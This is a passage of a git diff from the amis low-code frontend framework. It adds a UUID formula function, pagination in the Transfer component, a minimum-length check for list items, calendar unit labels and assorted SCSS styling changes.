labelField: props.data.labelField || 'title', valueField: props.data.valueField }; @@ -173,6 +171,12 @@ export default class ListItemControl extends React.Component< */ handleDelete(index: number) { const items = this.state.items.concat(); + const minLength = this.props.minLength; + + if (minLength > 0 && items.length <= minLength) { + toast.warning(`列表项数目不能少于${minLength}`); + return; + } items.splice(index, 1); this.setState({items}, () => this.onChange()); diff --git a/packages/amis-editor/src/renderer/event-control/helper.tsx b/packages/amis-editor/src/renderer/event-control/helper.tsx index 36fd16ef4..57aaceda7 100644 --- a/packages/amis-editor/src/renderer/event-control/helper.tsx +++ b/packages/amis-editor/src/renderer/event-control/helper.tsx @@ -1244,8 +1244,6 @@ export const ACTION_TYPE_TREE = (manager: any): RendererPluginAction[] => { 'path', 'value', 'index', - 'fromPage', - 'fromApp', '__valueInput', '__comboType', '__containerType' @@ -1283,29 +1281,34 @@ export const ACTION_TYPE_TREE = (manager: any): RendererPluginAction[] => { supportComponents: 'byComponent', schema: [ { - name: '__actionSubType', - type: 'radios', - label: '动作类型', - mode: 'horizontal', - options: [ - {label: '组件变量', value: 'cmpt'}, - {label: '页面变量', value: 'page'}, - {label: '内存变量', value: 'app'} - ], - value: - '${args.fromApp ? "app" : args.fromPage ? "page" : "cmpt"}', - onChange: (value: string, oldVal: any, data: any, form: any) => { - form.setValueByName('__valueInput', undefined); - form.setValueByName('args.value', undefined); - form.deleteValueByName('args.path'); - form.deleteValueByName('args.fromApp'); - form.deleteValueByName('args.fromPage'); - - if (value === 'page') { - form.setValueByName('args.fromPage', true); - } else if (value === 'app') { - form.setValueByName('args.fromApp', true); - } + children: ({render, data}: any) => { + const path = data?.args?.path || ''; + return render('setValueType', { + name: '__actionSubType', + type: 'radios', + label: '动作类型', + mode: 'horizontal', + options: [ + {label: '组件变量', value: 'cmpt'}, + {label: '页面变量', value: 'page'}, + {label: '内存变量', value: 'app'} + ], + value: /^appVariables/.test(path) // 只需要初始化时更新value + ? 'app' + : /^(__page|__query)/.test(path) + ? 'page' + : 'cmpt', + onChange: ( + value: string, + oldVal: any, + data: any, + form: any + ) => { + form.setValueByName('__valueInput', undefined); + form.setValueByName('args.value', undefined); + form.deleteValueByName('args.path'); + } + }); } }, // 组件变量 @@ -2349,6 +2352,12 @@ export const COMMON_ACTION_SCHEMA_MAP: { }, confirm: { descDetail: (info: any) => <div>打开确认对话框</div> + }, + preview: { + descDetail: (info: any) => <div>预览图片</div> + }, + zoom: { + descDetail: (info: any) => <div>调整图片比例</div> } }; @@ -3212,7 +3221,7 @@ export const getEventControlConfig = ( showCloseButton: true, showErrorMsg: true, showLoading: true, - className: 'app-popover', + className: 'app-popover :AMISCSSWrapper', actions: [ { type: 'button', @@ -3239,7 +3248,7 @@ export const getEventControlConfig = ( inline: false } ], - className: 'app-popover', + className: 'app-popover :AMISCSSWrapper', actions: [ { type: 'button', @@ -3376,9 +3385,7 @@ export const getEventControlConfig = ( /** 应用变量赋值 */ action.args = { path: config.args.path, - value: config.args?.value ?? '', - fromPage: action.args?.fromPage, - fromApp: action.args?.fromApp + value: config.args?.value ?? '' }; action.hasOwnProperty('componentId') && delete action.componentId; diff --git a/packages/amis-editor/src/renderer/textarea-formula/TextareaFormulaControl.tsx b/packages/amis-editor/src/renderer/textarea-formula/TextareaFormulaControl.tsx index d4c7d254e..67fdd15ea 100644 --- a/packages/amis-editor/src/renderer/textarea-formula/TextareaFormulaControl.tsx +++ b/packages/amis-editor/src/renderer/textarea-formula/TextareaFormulaControl.tsx @@ -148,7 +148,7 @@ export class TextareaFormulaControl extends React.Component< constructor(props: TextareaFormulaControlProps) { super(props); this.state = { - value: '', + value: this.props.value || '', variables: [], formulaPickerOpen: false, formulaPickerValue: '', diff --git a/packages/amis-formula/src/doc.md b/packages/amis-formula/src/doc.md index 37b95f335..ea51e564c 100644 --- a/packages/amis-formula/src/doc.md +++ b/packages/amis-formula/src/doc.md @@ -591,6 +591,16 @@ 返回:a.json`。 +### UUID + +用法:`UUID(8)` + + * `length:number` 生成的UUID字符串长度,默认为32位 + +返回:`string` 生成的UUID字符串 + +生成UUID字符串 + ## 日期函数 ### DATE diff --git a/packages/amis-formula/src/doc.ts b/packages/amis-formula/src/doc.ts index 5291b3029..8ad4d61eb 100644 --- a/packages/amis-formula/src/doc.ts +++ b/packages/amis-formula/src/doc.ts @@ -1022,6 +1022,23 @@ export const doc: { }, namespace: '文本函数' }, + { + name: 'UUID', + description: '生成UUID字符串', + example: 'UUID(8)', + params: [ + { + type: 'number', + name: 'length', + description: '生成的UUID字符串长度,默认为32位' + } + ], + returns: { + type: 'string', + description: '生成的UUID字符串' + }, + namespace: '文本函数' + }, { name: 'DATE', description: diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 92cdc2f67..db1d8658d 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -1514,6 +1514,21 @@ export class Evaluator { return text.split(/[\\/]/).pop(); } + /** + * 生成UUID字符串 + * + * @param {number} length - 生成的UUID字符串长度,默认为32位 + * @example UUID() + * @example UUID(8) + * @namespace 文本函数 + * + * @returns {string} 生成的UUID字符串 + */ + fnUUID(length: number = 36) { + const len = Math.min(Math.max(length, 0), 36); + return uuidv4().slice(0, len); + } + // 日期函数 /** @@ -2414,3 +2429,25 @@ export function createObject( return obj; } + +export function createStr() { + return ( + '00000000000000000' + (Math.random() * 0xffffffffffffffff).toString(16) + ).slice(-16); +} + +export function uuidv4() { + const a = createStr(); + const b = createStr(); + return ( + a.slice(0, 8) + + '-' + + a.slice(8, 12) + + '-4' + + a.slice(13) + + '-a' + + b.slice(1, 4) + + '-' + + b.slice(4) + ); +} diff --git a/packages/amis-ui/scss/_components.scss b/packages/amis-ui/scss/_components.scss index 8bbe78d56..74e9b563a 100644 --- a/packages/amis-ui/scss/_components.scss +++ b/packages/amis-ui/scss/_components.scss @@ -786,6 +786,7 @@ --transfer-base-header-paddingBottom: var(--sizes-size-5); --transfer-base-header-paddingLeft: var(--sizes-size-8); --transfer-base-header-paddingRight: var(--sizes-size-8); + --transfer-base-footer-border-color: var(--colors-neutral-line-8); --transfer-base-body-paddingTop: var(--sizes-size-0); --transfer-base-body-paddingBottom: var(--sizes-size-0); --transfer-base-body-paddingLeft: var(--sizes-size-0); @@ -2052,6 +2053,7 @@ --Tabs-onActive-bg: var(--background); --Tabs-onActive-borderColor: var(--borderColor); --Tabs-onActive-color: var(--colors-neutral-text-2); + --Tabs-onError-color: var(--colors-error-5); --Tabs-onDisabled-color: var(--colors-neutral-text-7); --Tabs-onHover-borderColor: var(--colors-neutral-line-8); --Tabs-add-icon-size: #{px2rem(15px)}; @@ -4130,6 +4132,7 @@ var(--combo-vertical-right-border-color) var(--combo-vertical-bottom-border-color) var(--combo-vertical-left-border-color); + --Combo--vertical-item--onError-borderColor: var(--colors-error-5); --Combo--vertical-item-borderRadius: var( --combo-vertical-top-left-border-radius ) diff --git a/packages/amis-ui/scss/_properties.scss b/packages/amis-ui/scss/_properties.scss index 19aec048c..466457909 100644 --- a/packages/amis-ui/scss/_properties.scss +++ b/packages/amis-ui/scss/_properties.scss @@ -274,22 +274,18 @@ $Table-strip-bg: transparent; --DropDown-menu-borderColor: var(--borderColor); --DropDown-menu-borderRadius: var(--borderRadius); --DropDown-menu-borderWidth: var(--borderWidth); - --DropDown-menu-boxShadow: var(--shadows-shadow-normal); - --DropDown-menu-height: #{px2rem(34px)}; + --DropDown-menu-boxShadow: var(--Form-select-outer-boxShadow); + --DropDown-menu-height: #{px2rem(32px)}; --DropDown-menu-minWidth: #{px2rem(160px)}; --DropDown-menu-paddingX: 0; --DropDown-menu-paddingY: var(--gap-xs); - --DropDown-menuItem-onHover-bg: var(--ListMenu-item--onHover-bg); + --DropDown-menuItem-onHover-bg: var(--Form-select-menu-onHover-bg); --DropDown-group-color: #848b99; --DropDown-menuItem-color: #151a26; - --DropDown-menuItem-onHover-color: var(--colors-brand-5); + --DropDown-menuItem-onHover-color: var(--Form-select-menu-onHover-color); --DropDown-menuItem-onActive-color: var(--colors-brand-5); --DropDown-menuItem-onDisabled-color: #b4b6ba; - --DropDown-menuItem-paddingX: var(--gap-sm); - --DropDown-menuItem-paddingY: calc( - (var(--DropDown-menu-height) - var(--fontSizeBase) * var(--lineHeightBase)) / - 2 - ); + --DropDown-menuItem-paddingX: var(--select-base-default-option-paddingRight); --Fieldset-legend-bgColor: var(--colors-neutral-fill-11); diff --git a/packages/amis-ui/scss/components/_dropdown.scss b/packages/amis-ui/scss/components/_dropdown.scss index fd2eaad31..b1665b58f 100644 --- a/packages/amis-ui/scss/components/_dropdown.scss +++ b/packages/amis-ui/scss/components/_dropdown.scss @@ -57,6 +57,7 @@ overflow-y: auto; overflow-x: hidden; max-height: px2rem(300px); + margin-top: px2rem(4px); } } @@ -67,10 +68,11 @@ &-menuItem, &-menu > li { - padding: var(--DropDown-menuItem-paddingY) var(--DropDown-menuItem-paddingX); + padding: 0 var(--DropDown-menuItem-paddingX); white-space: nowrap; box-sizing: border-box; height: var(--DropDown-menu-height); + line-height: var(--DropDown-menu-height); vertical-align: middle; user-select: none; color: var(--DropDown-menuItem-color); @@ -95,7 +97,7 @@ &.#{$ns}DropDown-divider { height: px2rem(1px); - margin: px2rem(9px) 0; + margin: px2rem(4px) 0; overflow: hidden; background: var(--DropDown-menu-borderColor); padding: 0; diff --git a/packages/amis-ui/scss/components/_menu.scss b/packages/amis-ui/scss/components/_menu.scss index de0134152..ef1c19979 100644 --- a/packages/amis-ui/scss/components/_menu.scss +++ b/packages/amis-ui/scss/components/_menu.scss @@ -519,14 +519,13 @@ .#{$ns}Nav-Menu-submenu-arrow { display: inline-block; font-size: px2rem(9px); - vertical-align: middle; text-transform: none; text-rendering: auto; line-height: px2rem(20px); margin-left: px2rem(5px); & > svg { - top: auto; + top: 0; } } diff --git a/packages/amis-ui/scss/components/_pagination.scss b/packages/amis-ui/scss/components/_pagination.scss index 72f7a8219..f54d27bb8 100644 --- a/packages/amis-ui/scss/components/_pagination.scss +++ b/packages/amis-ui/scss/components/_pagination.scss @@ -74,7 +74,7 @@ } } &-simple { - >ul >li { + > ul > li { &:hover, &:focus { outline: none; @@ -94,8 +94,6 @@ } } - - &-next { > span { cursor: pointer; @@ -113,47 +111,47 @@ align-items: center; height: var(--Pagination-height); - &-left { - color: var(--Pagination-light-color); - } - input { - min-width: px2rem(50px); - width: px2rem(50px); - height: var(--Pagination-height); - line-height: var(--Pagination-height); - // height: var(--Pagination-height); - border: none; - border: var(--borderWidth) solid var(--borderColor); - border-radius: var(--borderRadius) 0 0 var(--borderRadius); - padding: var(--Pagination-padding); - margin-left: px2rem(8px); - text-align: center; - - &:focus, - &:hover { - outline: none; - // border: var(--borderWidth) solid var(--primary); - border-color: var(--primary); - } + &-left { + color: var(--Pagination-light-color); + } + input { + min-width: px2rem(50px); + width: px2rem(50px); + height: var(--Pagination-height); + line-height: var(--Pagination-height); + // height: var(--Pagination-height); + border: none; + border: var(--borderWidth) solid var(--borderColor); + border-radius: var(--borderRadius) 0 0 var(--borderRadius); + padding: var(--Pagination-padding); + margin-left: px2rem(8px); + text-align: center; + + &:focus, + &:hover { + outline: none; + // border: var(--borderWidth) solid var(--primary); + border-color: var(--primary); } - &-right { - display: inline-block; - width: px2rem(32px); - cursor: pointer; - text-align: center; - height: var(--Pagination-height); - line-height: var(--Pagination-height); - border: var(--borderWidth) solid var(--borderColor); - border-left: none; - border-radius: 0 var(--borderRadius) var(--borderRadius) 0; - font-size: var(--fontSizeSm); - &:hover { - color: var(--primary); - border-color: var(--primary); - border-left: var(--borderWidth) solid var(--primary); - margin-left: -1px; - } + } + &-right { + display: inline-block; + width: px2rem(32px); + cursor: pointer; + text-align: center; + height: var(--Pagination-height); + line-height: var(--Pagination-height); + border: var(--borderWidth) solid var(--borderColor); + border-left: none; + border-radius: 0 var(--borderRadius) var(--borderRadius) 0; + font-size: var(--fontSizeSm); + &:hover { + color: var(--primary); + border-color: var(--primary); + border-left: var(--borderWidth) solid var(--primary); + margin-left: -1px; } + } } } @@ -161,7 +159,6 @@ line-height: px2rem(30px); .#{$ns}Pagination-item { - margin-left: px2rem(8px); &:nth-child(1) { margin-left: 0; } @@ -198,4 +195,4 @@ } text-align: right; -} \ No newline at end of file +} diff --git a/packages/amis-ui/scss/components/_table.scss b/packages/amis-ui/scss/components/_table.scss index d93fd7ab9..8ec35a319 100644 --- a/packages/amis-ui/scss/components/_table.scss +++ b/packages/amis-ui/scss/components/_table.scss @@ -1108,3 +1108,13 @@ } } } + +.#{$ns}AutoFilterToolbar { + display: block; + text-align: right; + white-space: nowrap; + + > .#{$ns}Button { + margin-top: 0; + } +} diff --git a/packages/amis-ui/scss/components/_tabs.scss b/packages/amis-ui/scss/components/_tabs.scss index 04e4f29ee..3f3e12914 100644 --- a/packages/amis-ui/scss/components/_tabs.scss +++ b/packages/amis-ui/scss/components/_tabs.scss @@ -18,10 +18,10 @@ .#{$ns}Tabs-addable { display: flex; - margin-left: var(--Tabs-add-margin); align-items: center; - justify-content: flex-start; - padding: var(--Tabs--line-addPadding); + margin-left: var(--Tabs-add-margin); + margin-bottom: px2rem(3px); + padding-bottom: px2rem(8px); white-space: nowrap; cursor: pointer; @@ -60,16 +60,19 @@ // } &-arrow { - margin: var(--Tabs--line-addPadding); width: 16px; height: 100%; display: flex; align-items: center; cursor: pointer; box-sizing: content-box; + margin-bottom: px2rem(3px); + padding-bottom: px2rem(8px); - .iconfont { - font-size: var(--Remark-icon-fontSize); + .icon { + top: 0; + width: var(--Remark-icon-fontSize); + height: var(--Remark-icon-fontSize); } &:hover { color: var(--icon-onHover-color); @@ -77,6 +80,9 @@ &--left { padding-right: 16px; + svg { + transform: rotate(180deg); + } } &--right { @@ -242,6 +248,10 @@ border-color: var(--Tabs-onActive-borderColor); border-bottom-color: transparent; } + + &.has-error > a:first-child { + color: var(--Tabs-onError-color) !important; + } } } @@ -672,6 +682,7 @@ .#{$ns}Tabs-addable { padding: 0 var(--Tabs--tiled-add-gap); margin-left: 0; + margin-bottom: 0; white-space: nowrap; border-style: solid; border-color: var(--Tabs-borderColor); @@ -1112,6 +1123,7 @@ & > .#{$ns}Tabs-linksContainer { > .#{$ns}Tabs-linksContainer-arrow { margin-bottom: 0; + padding: 0; } > .#{$ns}Tabs-linksContainer-main > .#{$ns}Tabs-links { @@ -1224,21 +1236,6 @@ > .#{$ns}Tabs-linksContainer { margin-bottom: calc(var(--Tabs-borderWidth) * -1); - &.#{$ns}Tabs-linksContainer--overflow - > .#{$ns}Tabs-linksContainer-main - > .#{$ns}Tabs-links - > .#{$ns}Tabs-link { - &:first-of-type { - border-left-width: 0; - border-top-left-radius: 0; - } - - &:last-of-type { - border-right-width: 0; - border-top-right-radius: 0; - } - } - .#{$ns}Tabs-linksContainer-arrow { width: var(--Tabs--strong-arrow-size); margin-bottom: 0; @@ -1250,14 +1247,14 @@ &--left { padding-right: 0; - border-right-width: 0; border-top-left-radius: var(--Tabs-borderRadius); + margin-right: px2rem(8px); } &--right { padding-left: 0; - border-left-width: 0; - border-top-right-radius: var(--Tabs-borderRadius); + border-top-left-radius: var(--Tabs-borderRadius); + margin-left: px2rem(8px); } } diff --git a/packages/amis-ui/scss/components/form/_combo.scss b/packages/amis-ui/scss/components/form/_combo.scss index e90f64b52..8a636c20f 100644 --- a/packages/amis-ui/scss/components/form/_combo.scss +++ b/packages/amis-ui/scss/components/form/_combo.scss @@ -258,6 +258,12 @@ var(--combo-vertical-paddingRight) var(--combo-vertical-paddingBottom) var(--combo-vertical-paddingLeft); position: relative; + + &.has-error { + border-color: var( + --Combo--vertical-item--onError-borderColor + ) !important; // 因为下面的规则权重更高 &:not(.is-disabled) > .#{$ns}Combo-items > .#{$ns}Combo-item:hover + } } > .#{$ns}Combo-items > .#{$ns}Combo-item { diff --git a/packages/amis-ui/scss/components/form/_date-range.scss b/packages/amis-ui/scss/components/form/_date-range.scss index 472bd0a72..d1cb8b22f 100644 --- a/packages/amis-ui/scss/components/form/_date-range.scss +++ b/packages/amis-ui/scss/components/form/_date-range.scss @@ -257,12 +257,9 @@ } .#{$ns}DateRangePicker-popover { - margin: px2rem(2px) 0 0; - - &.#{$ns}PopOver--leftTopLeftBottom, - &.#{$ns}PopOver--rightTopRightBottom { - margin: px2rem(-2px) 0 0; - } + border: var(--Form-select-outer-borderWidth) solid + var(--Form-input-onFocused-borderColor); + box-shadow: var(--Form-select-outer-boxShadow); } .#{$ns}DateRangePicker-popup { diff --git a/packages/amis-ui/scss/components/form/_date.scss b/packages/amis-ui/scss/components/form/_date.scss index 8dbb83150..fdaf4b64f 100644 --- a/packages/amis-ui/scss/components/form/_date.scss +++ b/packages/amis-ui/scss/components/form/_date.scss @@ -200,11 +200,9 @@ .#{$ns}DatePicker-popover { margin: px2rem(2px) 0 0; - - &.#{$ns}PopOver--leftTopLeftBottom, - &.#{$ns}PopOver--rightTopRightBottom { - margin: px2rem(-2px) 0 0; - } + border: var(--Form-select-outer-borderWidth) solid + var(--Form-input-onFocused-borderColor); + box-shadow: var(--Form-select-outer-boxShadow); } // 移动端输入框样式 diff --git a/packages/amis-ui/scss/components/form/_nested-select.scss b/packages/amis-ui/scss/components/form/_nested-select.scss index 86743da5e..e54305cf1 100644 --- a/packages/amis-ui/scss/components/form/_nested-select.scss +++ b/packages/amis-ui/scss/components/form/_nested-select.scss @@ -4,7 +4,7 @@ .#{$ns}NestedSelect-menu { padding-top: px2rem(4px); padding-bottom: px2rem(4px); - box-shadow: 0 px2rem(2px) px2rem(8px) 0 rgba(7, 12, 20, 0.12); + box-shadow: var(--Form-select-outer-boxShadow); } } @@ -18,8 +18,6 @@ &-optionArrowRight { display: inline-block; - padding-right: var(--Form-select-icon-rigin); - svg { width: px2rem(10px); height: px2rem(10px); @@ -29,6 +27,12 @@ } } + &-optionArrowRight.is-disabled { + svg { + color: var(--text--muted-color); + } + } + &-menuOuter { display: flex; } @@ -56,19 +60,23 @@ max-height: px2rem(175px); background: var(--Form-select-menu-bg); color: var(--Form-select-menu-color); - border: var(--Form-select-outer-borderWidth) solid - var(--Form-input-onFocused-borderColor); + border-radius: var(--borderRadius); box-shadow: var(--Form-select-outer-boxShadow); overflow-y: auto; overflow-x: hidden; - + border: var(--Form-select-outer-borderWidth) solid + var(--Form-input-onFocused-borderColor); &:not(:first-child) { border-left: 0; + margin-left: px2rem(4px); } .#{$ns}NestedSelect-option { position: relative; - padding-left: var(--gap-md); + padding: var(--select-base-default-option-paddingTop) + var(--select-base-default-option-paddingRight) + var(--select-base-default-option-paddingBottom) + var(--select-base-default-option-paddingLeft); min-height: var(--select-base-default-option-line-height); line-height: var(--select-base-default-option-line-height); cursor: pointer; @@ -122,3 +130,8 @@ height: px2rem(340px); } } + +.#{$ns}NestedSelect-popover { + border: none; + box-shadow: none; +} diff --git a/packages/amis-ui/scss/components/form/_select.scss b/packages/amis-ui/scss/components/form/_select.scss index 6b3753821..7f2f7c416 100644 --- a/packages/amis-ui/scss/components/form/_select.scss +++ b/packages/amis-ui/scss/components/form/_select.scss @@ -584,26 +584,15 @@ } .#{$ns}Select-popover { - margin-top: calc(var(--Form-select-outer-borderWidth) * -1); - background: var(--Form-select-menu-bg); color: var(--Form-select-menu-color); border: var(--Form-select-outer-borderWidth) solid var(--Form-input-onFocused-borderColor); box-shadow: var(--Form-select-outer-boxShadow); - border-top-left-radius: 0; - border-top-right-radius: 0; // min-width: px2rem(100px); // PopOver 上已经配置了,这个要是配置就会覆盖,所以先干掉好了 // z-index: 10; - - &.#{$ns}PopOver--leftTopLeftBottom { - margin-top: calc( - (var(--Form-select-popoverGap) - var(--Form-select-outer-borderWidth)) * - -1 - ); - } } .#{$ns}SelectControl { diff --git a/packages/amis-ui/scss/components/form/_text.scss b/packages/amis-ui/scss/components/form/_text.scss index 46fd4fc99..164392304 100644 --- a/packages/amis-ui/scss/components/form/_text.scss +++ b/packages/amis-ui/scss/components/form/_text.scss @@ -319,7 +319,10 @@ background: var(--Form-select-menu-bg); color: var(--Form-select-menu-color); border-radius: px2rem(2px); - box-shadow: var(--menu-box-shadow); + box-shadow: var(--Form-select-outer-boxShadow); + border: var(--Form-select-outer-borderWidth) solid + var(--Form-input-onFocused-borderColor); + padding: px2rem(4px) 0; } &-sugs { @@ -328,13 +331,11 @@ } &-sugItem { - padding: calc( - ( - var(--Form-selectOption-height) - var(--Form-input-lineHeight) * - var(--Form-input-fontSize) - #{px2rem(2px)} - ) / 2 - ) - px2rem(12px); + padding: var(--select-base-default-option-paddingTop) + var(--select-base-default-option-paddingRight) + var(--select-base-default-option-paddingBottom) + var(--select-base-default-option-paddingLeft); + line-height: var(--select-base-default-option-line-height); svg { width: px2rem(16px); diff --git a/packages/amis-ui/scss/components/form/_transfer.scss b/packages/amis-ui/scss/components/form/_transfer.scss index fbb24dd3a..dfec6c386 100644 --- a/packages/amis-ui/scss/components/form/_transfer.scss +++ b/packages/amis-ui/scss/components/form/_transfer.scss @@ -39,6 +39,42 @@ } } + &-footer { + border-top: 1px solid var(--transfer-base-footer-border-color); + display: flex; + flex-flow: row nowrap; + justify-content: flex-end; + padding: var(--gap-sm); + + /* 底部空间较小,让Pagination紧凑一些 */ + &-pagination { + & > ul { + &.#{$ns}Pagination-item { + margin-left: 0; + } + + & > li { + --Pagination-minWidth: #{px2rem(22px)}; + --Pagination-height: #{px2rem(22px)}; + --Pagination-padding: 0 #{px2rem(6px)}; + } + } + + .#{$ns}Pagination-perpage { + --select-base-default-paddingTop: 0; + --select-base-default-paddingBottom: 0; + --select-base-default-paddingLeft: #{px2rem(6px)}; + --select-base-default-paddingRight: #{px2rem(6px)}; + + margin-left: 0; + + .#{$ns}Select-valueWrap { + line-height: #{px2rem(22px)}; + } + } + } + } + &-select, &-result { overflow: hidden; @@ -64,6 +100,10 @@ var(--transfer-base-top-right-border-radius) var(--transfer-base-bottom-right-border-radius) var(--transfer-base-bottom-left-border-radius); + + &--pagination { + max-height: px2rem(475px); + } } &-select > &-selection, diff --git a/packages/amis-ui/src/components/Range.tsx b/packages/amis-ui/src/components/Range.tsx index 333110fed..a074df720 100644 --- a/packages/amis-ui/src/components/Range.tsx +++ b/packages/amis-ui/src/components/Range.tsx @@ -383,11 +383,16 @@ export class Range extends React.Component<RangeItemProps, any> { getStepValue(value: number, step: number) { const surplus = value % step; let result = 0; + let closeNum = Math.floor(value - (value % step)); // 余数 >= 步长一半 -> 向上取 // 余数 < 步长一半 -> 向下取 const _value = surplus >= step / 2 ? value : safeSub(value, step); while (result <= _value) { - result = safeAdd(result, step); + if (step < 1 || result === 0 || result === closeNum) { + result = safeAdd(result, step); + } else { + result = closeNum; + } } return result; } diff --git a/packages/amis-ui/src/components/Tabs.tsx b/packages/amis-ui/src/components/Tabs.tsx index ea5c2f0f5..6a049253c 100644 --- a/packages/amis-ui/src/components/Tabs.tsx +++ b/packages/amis-ui/src/components/Tabs.tsx @@ -50,6 +50,7 @@ export interface TabProps extends ThemeProps { tip?: string; tab?: Schema; className?: string; + tabClassName?: string; activeKey?: string | number; reload?: boolean; mountOnEnter?: boolean; @@ -738,7 +739,7 @@ export class Tabs extends React.Component<TabsProps, any> { disabled && 'Tabs-linksContainer-arrow--disabled' )} > - <i className={'iconfont icon-arrow-' + type} /> + <Icon icon="right-arrow-bold" className="icon" /> </div> ) : null; } diff --git a/packages/amis-ui/src/components/Transfer.tsx b/packages/amis-ui/src/components/Transfer.tsx index a8010072e..0c4c68f5f 100644 --- a/packages/amis-ui/src/components/Transfer.tsx +++ b/packages/amis-ui/src/components/Transfer.tsx @@ -4,7 +4,6 @@ import includes from 'lodash/includes'; import debounce from 'lodash/debounce'; import isEqual from 'lodash/isEqual'; import unionWith from 'lodash/unionWith'; - import {ThemeProps, themeable, findTree, differenceFromAll} from 'amis-core'; import {BaseSelectionProps, BaseSelection, ItemRenderStates} from './Selection'; import {Options, Option} from './Select'; @@ -24,6 +23,7 @@ import {ItemRenderStates as ResultItemRenderStates} from './ResultList'; import ResultTableList from './ResultTableList'; import ResultTreeList from './ResultTreeList'; import {SpinnerExtraProps} from './Spinner'; +import Pagination from './Pagination'; export type SelectMode = | 'table' @@ -113,6 +113,44 @@ export interface TransferProps checkAllLabel?: string; /** 树形模式下,给 tree 的属性 */ onlyChildren?: boolean; + /** 分页模式下累积的选项值,用于右侧回显 */ + accumulatedOptions?: Option[]; + /** 分页配置 */ + pagination?: { + /** 是否开启分页 */ + enable: boolean; + /** 分页组件CSS类名 */ + className?: string; + /** + * 通过控制layout属性的顺序,调整分页结构 total,perPage,pager,go + * @default 'pager' + */ + layout?: string | Array<string>; + + /** + * 指定每页可以显示多少条 + * @default [10, 20, 50, 100] + */ + perPageAvailable?: Array<number>; + + /** + * 最多显示多少个分页按钮。 + * + * @default 5 + */ + maxButtons?: number; + page?: number; + perPage?: number; + total?: number; + popOverContainer?: any; + popOverContainerSelector?: string; + }; + /** 切换分页事件 */ + onPageChange?: ( + page: number, + perPage?: number, + direction?: 'forward' | 'backward' + ) => void; } export interface TransferState { @@ -549,10 +587,33 @@ export class Transfer< {this.state.searchResult !== null ? this.renderSearchResult(props) : this.renderOptions(props)} + + {this.renderFooter()} </> ); } + renderFooter() { + const {classnames: cx, pagination, onPageChange} = this.props; + + return pagination?.enable ? ( + <div className={cx('Transfer-footer')}> + <Pagination + className={cx('Transfer-footer-pagination', pagination.className)} + activePage={pagination.page} + perPage={pagination.perPage} + total={pagination.total} + layout={pagination.layout} + maxButtons={pagination.maxButtons} + perPageAvailable={pagination.perPageAvailable} + popOverContainer={pagination.popOverContainer} + popOverContainerSelector={pagination.popOverContainerSelector} + onPageChange={onPageChange} + /> + </div> + ) : null; + } + renderSearchResult(props: TransferProps) { const { searchResultMode, @@ -827,9 +888,10 @@ export class Transfer< virtualThreshold, itemHeight, loadingConfig, - showInvalidMatch + showInvalidMatch, + pagination, + accumulatedOptions } = this.props; - const {resultSelectMode, isTreeDeferLoad} = this.state; const searchable = !isTreeDeferLoad && resultSearchable; @@ -840,7 +902,7 @@ export class Transfer< ref={this.domResultRef} classnames={cx} columns={columns!} - options={options || []} + options={(pagination?.enable ? accumulatedOptions : options) || []} value={value} disabled={disabled} option2value={option2value} @@ -862,7 +924,7 @@ export class Transfer< loadingConfig={loadingConfig} classnames={cx} className={cx('Transfer-value')} - options={options} + options={(pagination?.enable ? accumulatedOptions : options) || []} valueField={'value'} value={value || []} onChange={onChange!} @@ -915,7 +977,8 @@ export class Transfer< selectMode = 'list', translate: __, valueField = 'value', - mobileUI + mobileUI, + pagination } = this.props as any; const {searchResult} = this.state; @@ -939,7 +1002,11 @@ export class Transfer< <div className={cx('Transfer', className, inline ? 'Transfer--inline' : '')} > - <div className={cx('Transfer-select')}> + <div + className={cx('Transfer-select', { + 'Transfer-select--pagination': !!pagination?.enable + })} + > {this.renderSelect(this.props)} </div> <div className={cx('Transfer-mid', {'is-mobile': mobileUI})}> @@ -949,7 +1016,12 @@ export class Transfer< </div> ) : null} </div> - <div className={cx('Transfer-result', {'is-mobile': mobileUI})}> + <div + className={cx('Transfer-result', { + 'is-mobile': mobileUI, + 'Transfer-select--pagination': !!pagination?.enable + })} + > <div className={cx( 'Transfer-title', diff --git a/packages/amis-ui/src/components/calendar/DaysView.tsx b/packages/amis-ui/src/components/calendar/DaysView.tsx index 412921aac..ad1900a7b 100644 --- a/packages/amis-ui/src/components/calendar/DaysView.tsx +++ b/packages/amis-ui/src/components/calendar/DaysView.tsx @@ -239,7 +239,7 @@ export class CustomDaysView extends React.Component<CustomDaysViewProps> { const dateBoundary = this.props.getDateBoundary(currentDate); const columns = this.props.getColumns(types, dateBoundary); this.state = { - columns, + columns: this.getColumnsWithUnit(columns), types, pickerValue: currentDate.toArray(), uniqueTag: new Date().valueOf() @@ -277,6 +277,19 @@ export class CustomDaysView extends React.Component<CustomDaysViewProps> { }); } + getColumnsWithUnit(columns: {options: PickerOption[]}[]) { + return this.props.locale === 'zh-CN' && columns.length === 3 + ? columns.map((item, index) => { + item.options?.map((option: any) => { + option.text = + option.text + (index === 0 ? '年' : index === 1 ? '月' : '日'); + return option; + }); + return item; + }) + : columns; + } + updateSelectedDate = (event: React.MouseEvent<any>) => { // need confirm if (this.props.requiredConfirm) { @@ -767,7 +780,9 @@ export class CustomDaysView extends React.Component<CustomDaysViewProps> { ); const dateBoundary = this.props.getDateBoundary(selectDate); this.setState({ - columns: this.props.getColumns(this.state.types, dateBoundary), + columns: this.getColumnsWithUnit( + this.props.getColumns(this.state.types, dateBoundary) + ), pickerValue: value }); } diff --git a/packages/amis-ui/src/components/calendar/MonthsView.tsx b/packages/amis-ui/src/components/calendar/MonthsView.tsx index d8092039a..0463711b0 100644 --- a/packages/amis-ui/src/components/calendar/MonthsView.tsx +++ b/packages/amis-ui/src/components/calendar/MonthsView.tsx @@ -63,7 +63,7 @@ export class CustomMonthsView extends React.Component<CustomMonthsViewProps> { const dateBoundary = this.props.getDateBoundary(currentDate); const columns = this.props.getColumns(['year', 'month'], dateBoundary); this.state = { - columns, + columns: this.getColumnsWithUnit(columns), pickerValue: currentDate.toArray() }; @@ -141,6 +141,18 @@ export class CustomMonthsView extends React.Component<CustomMonthsViewProps> { this.props.updateSelectedDate(event); } + getColumnsWithUnit(columns: {options: PickerOption[]}[]) { + return this.props.locale === 'zh-CN' && columns.length === 2 + ? columns.map((item, index) => { + item.options?.map((option: any) => { + option.text = option.text + (index === 0 ? '年' : '月'); + return option; + }); + return item; + }) + : columns; + } + renderMonth = ( props: any, month: number, @@ -205,7 +217,10 @@ export class CustomMonthsView extends React.Component<CustomMonthsViewProps> { }; }) }; - this.setState({columns, pickerValue: 